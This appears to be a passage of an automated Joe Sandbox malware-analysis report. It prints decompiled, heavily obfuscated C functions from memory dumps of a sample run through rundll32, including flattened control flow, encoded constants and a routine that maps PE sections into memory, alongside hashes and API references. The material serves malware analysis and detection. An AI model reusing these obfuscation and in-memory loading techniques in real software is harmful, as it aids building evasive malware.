                                                                                                                      				_v596 = _v596 ^ 0x5b73fee0;
                                                                                                                      				_v596 = _v596 ^ 0x9196765f;
                                                                                                                      				_v604 = 0x945bcd;
                                                                                                                      				_v604 = _v604 + 0xffffdd7c;
                                                                                                                      				_v604 = _v604 | 0x6dfc281c;
                                                                                                                      				_v604 = _v604 << 3;
                                                                                                                      				_v604 = _v604 ^ 0x6fe21eca;
                                                                                                                      				_v580 = 0xe4e766;
                                                                                                                      				_t122 =  &_v580; // 0xe4e766
                                                                                                                      				_t210 = 0x1c;
                                                                                                                      				_t177 =  *_t122 / _t210;
                                                                                                                      				_v580 = _t177;
                                                                                                                      				_v580 = _v580 + 0x73a9;
                                                                                                                      				_v580 = _v580 | 0xb028f1fa;
                                                                                                                      				_v580 = _v580 ^ 0xb0236f0a;
                                                                                                                      				_v572 = 0x26d4cb;
                                                                                                                      				_v572 = _v572 ^ 0xbda42e04;
                                                                                                                      				_v572 = _v572 << 8;
                                                                                                                      				_v572 = _v572 ^ 0x82f622a5;
                                                                                                                      				_v560 = 0x78c236;
                                                                                                                      				_v560 = _v560 | 0xc7202908;
                                                                                                                      				_v560 = _v560 >> 9;
                                                                                                                      				_v560 = _v560 ^ 0x0065a40e;
                                                                                                                      				do {
                                                                                                                      					while(_t183 != 0x6eb28ed) {
                                                                                                                      						if(_t183 == 0x7fdcf56) {
                                                                                                                      							return E00341950(_v580, _v572, __eflags, 0,  &_v524,  &_v524, E0035D3C8, _v560);
                                                                                                                      						}
                                                                                                                      						if(_t183 == 0xb7324ef) {
                                                                                                                      							_t177 = E00354FA8(_v588,  &_v524, _v596, _v604);
                                                                                                                      							 *_t177 = 0;
                                                                                                                      							_t183 = 0x7fdcf56;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						_t220 = _t183 - 0xb9bc25f;
                                                                                                                      						if(_t183 != 0xb9bc25f) {
                                                                                                                      							goto L8;
                                                                                                                      						}
                                                                                                                      						_push(_v600);
                                                                                                                      						_push(_v564);
                                                                                                                      						_push(0x3410cc);
                                                                                                                      						_t180 = E0034AB66(_v552, _v548, _t220);
                                                                                                                      						_t190 =  *0x36520c; // 0x0
                                                                                                                      						_t192 =  *0x36520c; // 0x0
                                                                                                                      						E0034E7CE(_t180, _t220, _v556, _t192 + 8, _t190 + 0x220, _v536, _v584, _v576, _v540, _t190 + 0x220);
                                                                                                                      						_t177 = E0034AE03(_v544, _v592, _v568, _t180);
                                                                                                                      						_t213 =  &(_t213[0xd]);
                                                                                                                      						_t183 = 0xb7324ef;
                                                                                                                      					}
                                                                                                                      					_t183 = 0xb9bc25f;
                                                                                                                      					L8:
                                                                                                                      					__eflags = _t183 - 0x6d02df3;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t177;
                                                                                                                      			}


































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Xti$f$NDh$i""
                                                                                                                      • API String ID: 0-1187746982
                                                                                                                      • Opcode ID: 36ef62d7f512901be6f7d33270ee0ca2535971948e4278b5229835256e01fe8c
                                                                                                                      • Instruction ID: 6fac59694d485036e1c7a2ea4fade683914ea2248176eff55461712c87fd5d2a
                                                                                                                      • Opcode Fuzzy Hash: 36ef62d7f512901be6f7d33270ee0ca2535971948e4278b5229835256e01fe8c
                                                                                                                      • Instruction Fuzzy Hash: 6A813F710093419FC399CF61DA8A51FBBE1FBC4758F109A1DF2969A260D3B49A09CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E0035A156(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v128;
                                                                                                                      				signed int _v132;
                                                                                                                      				intOrPtr _v136;
                                                                                                                      				char _v140;
                                                                                                                      				signed int _v144;
                                                                                                                      				signed int _v148;
                                                                                                                      				signed int _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				signed int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				void* _t133;
                                                                                                                      				signed int _t146;
                                                                                                                      				void* _t147;
                                                                                                                      				void* _t155;
                                                                                                                      				char* _t156;
                                                                                                                      				void* _t174;
                                                                                                                      				signed int _t175;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int _t177;
                                                                                                                      				signed int _t178;
                                                                                                                      				signed int* _t183;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t174 = __edx;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t133);
                                                                                                                      				_v132 = _v132 & 0x00000000;
                                                                                                                      				_t183 =  &(( &_v196)[5]);
                                                                                                                      				_v136 = 0x446ea7;
                                                                                                                      				_v180 = 0x28766d;
                                                                                                                      				_t155 = 0x8ee0430;
                                                                                                                      				_v180 = _v180 | 0x8061b26e;
                                                                                                                      				_t175 = 0x7a;
                                                                                                                      				_v180 = _v180 / _t175;
                                                                                                                      				_v180 = _v180 ^ 0x0107c2a1;
                                                                                                                      				_v160 = 0x181348;
                                                                                                                      				_t176 = 0x24;
                                                                                                                      				_v160 = _v160 / _t176;
                                                                                                                      				_v160 = _v160 ^ 0x00002248;
                                                                                                                      				_v192 = 0xf13979;
                                                                                                                      				_v192 = _v192 + 0xffff8439;
                                                                                                                      				_v192 = _v192 << 0xb;
                                                                                                                      				_v192 = _v192 + 0x337f;
                                                                                                                      				_v192 = _v192 ^ 0x85ec5d3f;
                                                                                                                      				_v148 = 0x5e6289;
                                                                                                                      				_v148 = _v148 >> 5;
                                                                                                                      				_v148 = _v148 ^ 0x00022a63;
                                                                                                                      				_v184 = 0xe3b806;
                                                                                                                      				_v184 = _v184 + 0xc2d8;
                                                                                                                      				_v184 = _v184 | 0x759fad77;
                                                                                                                      				_v184 = _v184 ^ 0x75f287c1;
                                                                                                                      				_v168 = 0x566c5d;
                                                                                                                      				_v168 = _v168 ^ 0x750ff463;
                                                                                                                      				_v168 = _v168 ^ 0x75584e2a;
                                                                                                                      				_v152 = 0x83e247;
                                                                                                                      				_v152 = _v152 ^ 0x81f90c1d;
                                                                                                                      				_v152 = _v152 ^ 0x81706586;
                                                                                                                      				_v188 = 0x5c5a6b;
                                                                                                                      				_v188 = _v188 >> 9;
                                                                                                                      				_v188 = _v188 << 0xb;
                                                                                                                      				_v188 = _v188 >> 0xf;
                                                                                                                      				_v188 = _v188 ^ 0x00030e37;
                                                                                                                      				_v176 = 0xc154a1;
                                                                                                                      				_v176 = _v176 | 0xc3f8b8be;
                                                                                                                      				_t177 = 0x3c;
                                                                                                                      				_v176 = _v176 * 0x16;
                                                                                                                      				_v176 = _v176 ^ 0xd77414a9;
                                                                                                                      				_v164 = 0x5dd26c;
                                                                                                                      				_v164 = _v164 * 0x18;
                                                                                                                      				_v164 = _v164 ^ 0x08c2b6d4;
                                                                                                                      				_v144 = 0x980588;
                                                                                                                      				_v144 = _v144 << 3;
                                                                                                                      				_v144 = _v144 ^ 0x04c0143e;
                                                                                                                      				_v196 = 0xd24b78;
                                                                                                                      				_v196 = _v196 * 0xf;
                                                                                                                      				_v196 = _v196 * 7;
                                                                                                                      				_v196 = _v196 / _t177;
                                                                                                                      				_v196 = _v196 ^ 0x017222e8;
                                                                                                                      				_v156 = 0x8c94fd;
                                                                                                                      				_v156 = _v156 + 0xffff8671;
                                                                                                                      				_v156 = _v156 ^ 0x0082913e;
                                                                                                                      				_v172 = 0x17d6e;
                                                                                                                      				_t178 = 0x63;
                                                                                                                      				_t146 = _v172 / _t178;
                                                                                                                      				_v172 = _t146;
                                                                                                                      				_v172 = _v172 + 0x20ae;
                                                                                                                      				_v172 = _v172 ^ 0x00044ed7;
                                                                                                                      				do {
                                                                                                                      					while(_t155 != 0x2e9bf4f) {
                                                                                                                      						if(_t155 == 0x570f58c) {
                                                                                                                      							_push(0x341494);
                                                                                                                      							_push(_v168);
                                                                                                                      							_t147 = E0034BB4B(_v148, _v184, __eflags);
                                                                                                                      							E0035D1C1(__eflags, _t174, _v188, _v176, _t147, E0034F154(__eflags), _v164, _v144);
                                                                                                                      							return E0034AE03(_v196, _v156, _v172, _t147);
                                                                                                                      						}
                                                                                                                      						if(_t155 == 0x8ee0430) {
                                                                                                                      							_t155 = 0xffbee7a;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t155 != 0xffbee7a) {
                                                                                                                      							goto L17;
                                                                                                                      						}
                                                                                                                      						_v140 = 0x80;
                                                                                                                      						_t146 = E00353F73(_v180, _v160,  &_v140, _v192,  &_v128);
                                                                                                                      						_t183 =  &(_t183[3]);
                                                                                                                      						_t155 = 0x2e9bf4f;
                                                                                                                      					}
                                                                                                                      					__eflags = _v128;
                                                                                                                      					_t156 =  &_v128;
                                                                                                                      					if(_v128 == 0) {
                                                                                                                      						L16:
                                                                                                                      						_t155 = 0x570f58c;
                                                                                                                      						goto L17;
                                                                                                                      					} else {
                                                                                                                      						goto L8;
                                                                                                                      					}
                                                                                                                      					do {
                                                                                                                      						L8:
                                                                                                                      						_t146 =  *_t156;
                                                                                                                      						__eflags = _t146 - 0x30;
                                                                                                                      						if(_t146 < 0x30) {
                                                                                                                      							L10:
                                                                                                                      							__eflags = _t146 - 0x61;
                                                                                                                      							if(_t146 < 0x61) {
                                                                                                                      								L12:
                                                                                                                      								__eflags = _t146 - 0x41;
                                                                                                                      								if(_t146 < 0x41) {
                                                                                                                      									L14:
                                                                                                                      									 *_t156 = 0x58;
                                                                                                                      									goto L15;
                                                                                                                      								}
                                                                                                                      								__eflags = _t146 - 0x5a;
                                                                                                                      								if(_t146 <= 0x5a) {
                                                                                                                      									goto L15;
                                                                                                                      								}
                                                                                                                      								goto L14;
                                                                                                                      							}
                                                                                                                      							__eflags = _t146 - 0x7a;
                                                                                                                      							if(_t146 <= 0x7a) {
                                                                                                                      								goto L15;
                                                                                                                      							}
                                                                                                                      							goto L12;
                                                                                                                      						}
                                                                                                                      						__eflags = _t146 - 0x39;
                                                                                                                      						if(_t146 <= 0x39) {
                                                                                                                      							goto L15;
                                                                                                                      						}
                                                                                                                      						goto L10;
                                                                                                                      						L15:
                                                                                                                      						_t156 = _t156 + 1;
                                                                                                                      						__eflags =  *_t156;
                                                                                                                      					} while ( *_t156 != 0);
                                                                                                                      					goto L16;
                                                                                                                      					L17:
                                                                                                                      					__eflags = _t155 - 0x55e4d43;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				return _t146;
                                                                                                                      			}
                                                                                                                      0x0035a3c0
                                                                                                                      0x0035a3c0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a39d
                                                                                                                      0x0035a39d
                                                                                                                      0x0035a39d
                                                                                                                      0x0035a39f
                                                                                                                      0x0035a3a1
                                                                                                                      0x0035a3a7
                                                                                                                      0x0035a3a7
                                                                                                                      0x0035a3a9
                                                                                                                      0x0035a3af
                                                                                                                      0x0035a3af
                                                                                                                      0x0035a3b1
                                                                                                                      0x0035a3b7
                                                                                                                      0x0035a3b7
                                                                                                                      0x00000000
                                                                                                                      0x0035a3b7
                                                                                                                      0x0035a3b3
                                                                                                                      0x0035a3b5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a3b5
                                                                                                                      0x0035a3ab
                                                                                                                      0x0035a3ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a3ad
                                                                                                                      0x0035a3a3
                                                                                                                      0x0035a3a5
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0035a3ba
                                                                                                                      0x0035a3ba
                                                                                                                      0x0035a3bb
                                                                                                                      0x0035a3bb
                                                                                                                      0x00000000
                                                                                                                      0x0035a3c2
                                                                                                                      0x0035a3c2
                                                                                                                      0x0035a3c2
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *NXu$H"$kZ\$mv(
                                                                                                                      • API String ID: 0-3447753402
                                                                                                                      • Opcode ID: fe5adfc32565a970a879555416db85d39424805267ad3011b1bf0be04e0d7060
                                                                                                                      • Instruction ID: 807885620475d6db501746132095537d9f3304ec858010b980245903284e97a0
                                                                                                                      • Opcode Fuzzy Hash: fe5adfc32565a970a879555416db85d39424805267ad3011b1bf0be04e0d7060
                                                                                                                      • Instruction Fuzzy Hash: 6E7164754083809BC769CE25C489A1FBBF2BBC5758F505A0DF8869A260C3B5CA49CB43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E0034F58F(void* __ecx, char _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				char _v560;
                                                                                                                      				char _v624;
                                                                                                                      				signed int _v628;
                                                                                                                      				signed int _v632;
                                                                                                                      				signed int _v636;
                                                                                                                      				signed int _v640;
                                                                                                                      				signed int _v644;
                                                                                                                      				signed int _v648;
                                                                                                                      				signed int _v652;
                                                                                                                      				signed int _v656;
                                                                                                                      				signed int _v660;
                                                                                                                      				signed int _v664;
                                                                                                                      				signed int _v668;
                                                                                                                      				signed int _v672;
                                                                                                                      				signed int _v676;
                                                                                                                      				signed int _v680;
                                                                                                                      				void* _t129;
                                                                                                                      				signed int _t143;
                                                                                                                      				signed int _t144;
                                                                                                                      				void* _t151;
                                                                                                                      				signed int _t155;
                                                                                                                      				char _t173;
                                                                                                                      				signed int _t174;
                                                                                                                      				signed int _t175;
                                                                                                                      				signed int _t176;
                                                                                                                      				signed int _t177;
                                                                                                                      				signed int* _t181;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_t173 = _a4;
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_t173);
                                                                                                                      				_push(E00360CF5);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t129);
                                                                                                                      				_v660 = 0x8d8445;
                                                                                                                      				_t181 =  &(( &_v680)[5]);
                                                                                                                      				_t151 = 0x740f7fb;
                                                                                                                      				_t174 = 0x71;
                                                                                                                      				_v660 = _v660 / _t174;
                                                                                                                      				_v660 = _v660 ^ 0x128b90b3;
                                                                                                                      				_v660 = _v660 ^ 0x128ad02b;
                                                                                                                      				_v640 = 0x9067b5;
                                                                                                                      				_v640 = _v640 + 0x286c;
                                                                                                                      				_v640 = _v640 ^ 0x00975038;
                                                                                                                      				_v632 = 0x5011ea;
                                                                                                                      				_v632 = _v632 + 0xffff22a1;
                                                                                                                      				_v632 = _v632 ^ 0x00475e04;
                                                                                                                      				_v628 = 0xc0b5ed;
                                                                                                                      				_v628 = _v628 | 0x09c79ac0;
                                                                                                                      				_v628 = _v628 ^ 0x09cd8243;
                                                                                                                      				_v652 = 0x6be172;
                                                                                                                      				_v652 = _v652 << 0xe;
                                                                                                                      				_v652 = _v652 ^ 0xf9ae6093;
                                                                                                                      				_v652 = _v652 ^ 0x01f8093d;
                                                                                                                      				_v644 = 0xbd5efb;
                                                                                                                      				_v644 = _v644 << 3;
                                                                                                                      				_v644 = _v644 ^ 0x05e3f72f;
                                                                                                                      				_v656 = 0xc95ad0;
                                                                                                                      				_t175 = 0x15;
                                                                                                                      				_v656 = _v656 / _t175;
                                                                                                                      				_v656 = _v656 | 0xa2f71cc0;
                                                                                                                      				_v656 = _v656 ^ 0xa2f780bc;
                                                                                                                      				_v676 = 0xbb6512;
                                                                                                                      				_v676 = _v676 << 0x10;
                                                                                                                      				_v676 = _v676 ^ 0x67ff039f;
                                                                                                                      				_v676 = _v676 + 0xffff3430;
                                                                                                                      				_v676 = _v676 ^ 0x02e7c46b;
                                                                                                                      				_v636 = 0x771a54;
                                                                                                                      				_v636 = _v636 >> 0xf;
                                                                                                                      				_v636 = _v636 ^ 0x000f324c;
                                                                                                                      				_v680 = 0x44376b;
                                                                                                                      				_v680 = _v680 + 0xffff61f8;
                                                                                                                      				_v680 = _v680 + 0xffff924c;
                                                                                                                      				_v680 = _v680 << 0xc;
                                                                                                                      				_v680 = _v680 ^ 0x32b3ed2b;
                                                                                                                      				_v672 = 0x492cee;
                                                                                                                      				_v672 = _v672 | 0xff7fdef6;
                                                                                                                      				_v672 = _v672 ^ 0xff79836a;
                                                                                                                      				_v664 = 0x821e3f;
                                                                                                                      				_v664 = _v664 + 0xffff0102;
                                                                                                                      				_v664 = _v664 << 0xd;
                                                                                                                      				_v664 = _v664 ^ 0x23edf1fd;
                                                                                                                      				_v648 = 0xfa5772;
                                                                                                                      				_v648 = _v648 + 0x1fee;
                                                                                                                      				_v648 = _v648 ^ 0x00f8d439;
                                                                                                                      				_v668 = 0x765780;
                                                                                                                      				_t176 = 0x5a;
                                                                                                                      				_v668 = _v668 / _t176;
                                                                                                                      				_t177 = 0x7e;
                                                                                                                      				_t178 = _v648;
                                                                                                                      				_v668 = _v668 / _t177;
                                                                                                                      				_v668 = _v668 ^ 0x0009a212;
                                                                                                                      				L1:
                                                                                                                      				while(_t151 != 0x4c653bf) {
                                                                                                                      					if(_t151 == 0x50dca7b) {
                                                                                                                      						_v560 = 0x22c;
                                                                                                                      						_t144 = E00360296( &_v560, _v644, _t178, _v656, _v676);
                                                                                                                      						_t181 =  &(_t181[3]);
                                                                                                                      						L10:
                                                                                                                      						asm("sbb ecx, ecx");
                                                                                                                      						_t155 =  ~_t144 & 0x074f90c1;
                                                                                                                      						L8:
                                                                                                                      						_t151 = _t155 + 0x59cade0;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t151 == 0x59cade0) {
                                                                                                                      						return E00354DAD(_v672, _v664, _t178, _v648, _v668);
                                                                                                                      					}
                                                                                                                      					if(_t151 == 0x740f7fb) {
                                                                                                                      						_v624 = _t173;
                                                                                                                      						_t151 = 0x4c653bf;
                                                                                                                      						continue;
                                                                                                                      					}
                                                                                                                      					if(_t151 == 0xc1665e4) {
                                                                                                                      						_t144 = E0035E3F7(_v636, _t178,  &_v560, _v680);
                                                                                                                      						goto L10;
                                                                                                                      					}
                                                                                                                      					_t190 = _t151 - 0xcec3ea1;
                                                                                                                      					if(_t151 != 0xcec3ea1) {
                                                                                                                      						L16:
                                                                                                                      						__eflags = _t151 - 0x2876c78;
                                                                                                                      						if(__eflags != 0) {
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						return _t144;
                                                                                                                      					}
                                                                                                                      					_t144 = E00360CF5(_t151, _t190,  &_v560,  &_v624);
                                                                                                                      					asm("sbb ecx, ecx");
                                                                                                                      					_t155 =  ~_t144 & 0x0679b804;
                                                                                                                      					goto L8;
                                                                                                                      				}
                                                                                                                      				_t143 = E00343C3B(_t151, _v660);
                                                                                                                      				_t178 = _t143;
                                                                                                                      				_t181 = _t181 - 0xc + 0x10;
                                                                                                                      				__eflags = _t143 - 0xffffffff;
                                                                                                                      				if(__eflags == 0) {
                                                                                                                      					_t151 = 0x2876c78;
                                                                                                                      					goto L16;
                                                                                                                      				}
                                                                                                                      				_t151 = 0x50dca7b;
                                                                                                                      				goto L1;
                                                                                                                      			}































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: k7D$l($rk$,I
                                                                                                                      • API String ID: 0-1943337972
                                                                                                                      • Opcode ID: 108d1846da2b3672ebb1fd69a9040d88fa0e2199f865efb73282afcadcc385d0
                                                                                                                      • Instruction ID: ed00d25200880d8fb32f9cef608a147490c40e24e1a953244ad5864e08800f1b
                                                                                                                      • Opcode Fuzzy Hash: 108d1846da2b3672ebb1fd69a9040d88fa0e2199f865efb73282afcadcc385d0
                                                                                                                      • Instruction Fuzzy Hash: 30718AB15083019FC768CE28C58985FBBF1FBC4758F544A2EF6969A260C7B49909CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 89%
                                                                                                                      			E00358D71(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                      				signed int _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				void* _t119;
                                                                                                                      				void* _t128;
                                                                                                                      				void* _t138;
                                                                                                                      				void* _t140;
                                                                                                                      				signed int _t142;
                                                                                                                      				signed int _t143;
                                                                                                                      				void* _t158;
                                                                                                                      				void* _t163;
                                                                                                                      				signed int* _t167;
                                                                                                                      				signed int* _t168;
                                                                                                                      				signed int* _t169;
                                                                                                                      
                                                                                                                      				_t165 = _a12;
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0034CF25(_t119);
                                                                                                                      				_v4 = _v4 & 0x00000000;
                                                                                                                      				_v12 = 0xd63ca;
                                                                                                                      				_v8 = 0x2a80fb;
                                                                                                                      				_v32 = 0xd656a7;
                                                                                                                      				_t142 = 0x2a;
                                                                                                                      				_v32 = _v32 * 0x76;
                                                                                                                      				_v32 = _v32 ^ 0x62cbe0fa;
                                                                                                                      				_v60 = 0xd42ea;
                                                                                                                      				_v60 = _v60 | 0xae184de3;
                                                                                                                      				_v60 = _v60 * 0x64;
                                                                                                                      				_v60 = _v60 ^ 0xa1370c8b;
                                                                                                                      				_v60 = _v60 ^ 0xa2441b47;
                                                                                                                      				_v28 = 0x613a22;
                                                                                                                      				_v28 = _v28 + 0xe1cd;
                                                                                                                      				_v28 = _v28 ^ 0x00621baf;
                                                                                                                      				_v48 = 0x1555f7;
                                                                                                                      				_v48 = _v48 | 0xf97f7abf;
                                                                                                                      				_v48 = _v48 ^ 0xf978b226;
                                                                                                                      				_v36 = 0xa4495c;
                                                                                                                      				_v36 = _v36 << 0xc;
                                                                                                                      				_v36 = _v36 ^ 0x449a63ff;
                                                                                                                      				_v64 = 0xc77e0d;
                                                                                                                      				_v64 = _v64 * 0x7d;
                                                                                                                      				_v64 = _v64 << 3;
                                                                                                                      				_v64 = _v64 / _t142;
                                                                                                                      				_v64 = _v64 ^ 0x0042e8ad;
                                                                                                                      				_v24 = 0xcd3d37;
                                                                                                                      				_v24 = _v24 ^ 0xb946add1;
                                                                                                                      				_v24 = _v24 ^ 0xb982581d;
                                                                                                                      				_v40 = 0xe4266b;
                                                                                                                      				_v40 = _v40 << 9;
                                                                                                                      				_v40 = _v40 >> 5;
                                                                                                                      				_v40 = _v40 ^ 0x064c7215;
                                                                                                                      				_v44 = 0x9ee2d0;
                                                                                                                      				_v44 = _v44 + 0xdca1;
                                                                                                                      				_v44 = _v44 ^ 0x9755f080;
                                                                                                                      				_v44 = _v44 ^ 0x97c96657;
                                                                                                                      				_v20 = 0xa48706;
                                                                                                                      				_v20 = _v20 | 0xe10b6776;
                                                                                                                      				_v20 = _v20 ^ 0xe1a97c21;
                                                                                                                      				_v56 = 0x583a03;
                                                                                                                      				_v56 = _v56 * 0x56;
                                                                                                                      				_v56 = _v56 + 0x9dad;
                                                                                                                      				_v56 = _v56 * 0x55;
                                                                                                                      				_v56 = _v56 ^ 0xd77aa722;
                                                                                                                      				_v52 = 0xf9a5b4;
                                                                                                                      				_v52 = _v52 >> 6;
                                                                                                                      				_v52 = _v52 + 0xffff4c61;
                                                                                                                      				_v52 = _v52 << 8;
                                                                                                                      				_v52 = _v52 ^ 0x033f85cc;
                                                                                                                      				_v16 = 0x1cccaa;
                                                                                                                      				_v16 = _v16 + 0x745b;
                                                                                                                      				_v16 = _v16 ^ 0x0015a734;
                                                                                                                      				_t143 = _v48;
                                                                                                                      				_t128 = E0035BE0B(_t143, _v36, _v64, _a12);
                                                                                                                      				_t138 = _t128;
                                                                                                                      				_t167 =  &(( &_v64)[8]);
                                                                                                                      				if(_t138 != 0) {
                                                                                                                      					_push(_t143);
                                                                                                                      					_t158 = E0034B0DA(_v24, _v40,  *((intOrPtr*)(_t138 + 0x50)), _v28, _v44, _v60 | _v32);
                                                                                                                      					_t168 =  &(_t167[5]);
                                                                                                                      					if(_t158 == 0) {
                                                                                                                      						L6:
                                                                                                                      						return _t158;
                                                                                                                      					}
                                                                                                                      					E0035FD29( *_t165, _v20, _t158, _v56,  *((intOrPtr*)(_t138 + 0x54)));
                                                                                                                      					_t169 =  &(_t168[3]);
                                                                                                                      					_t163 = ( *(_t138 + 0x14) & 0x0000ffff) + 0x18 + _t138;
                                                                                                                      					_t140 = ( *(_t138 + 6) & 0x0000ffff) * 0x28 + _t163;
                                                                                                                      					while(_t163 < _t140) {
                                                                                                                      						_t136 =  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10));
                                                                                                                      						E0035FD29( *((intOrPtr*)(_t163 + 0x14)) +  *_t165, _v52,  *((intOrPtr*)(_t163 + 0xc)) + _t158, _v16,  <  ?  *((void*)(_t163 + 8)) :  *((intOrPtr*)(_t163 + 0x10)));
                                                                                                                      						_t169 =  &(_t169[3]);
                                                                                                                      						_t163 = _t163 + 0x28;
                                                                                                                      					}
                                                                                                                      					goto L6;
                                                                                                                      				}
                                                                                                                      				return _t128;
                                                                                                                      			}


                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ":a$[t$k&$B
                                                                                                                      • API String ID: 0-806590991
                                                                                                                      • Opcode ID: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction ID: 693e3dfa63d679ee942b863a3d7dbd234207291121e6add13105105a0cda6f27
                                                                                                                      • Opcode Fuzzy Hash: 281fa8f6f751c76a05968668069489b05116c67e6a0c28320e401ee3824aa1ba
                                                                                                                      • Instruction Fuzzy Hash: 375111B15083809FC354CF65C98691BFBF1BBC8748F409A1DF9996A220D7B5DA498F06
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                      • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                      • GetACP.KERNEL32 ref: 1004377E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450605334.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450636227.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.450644668.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
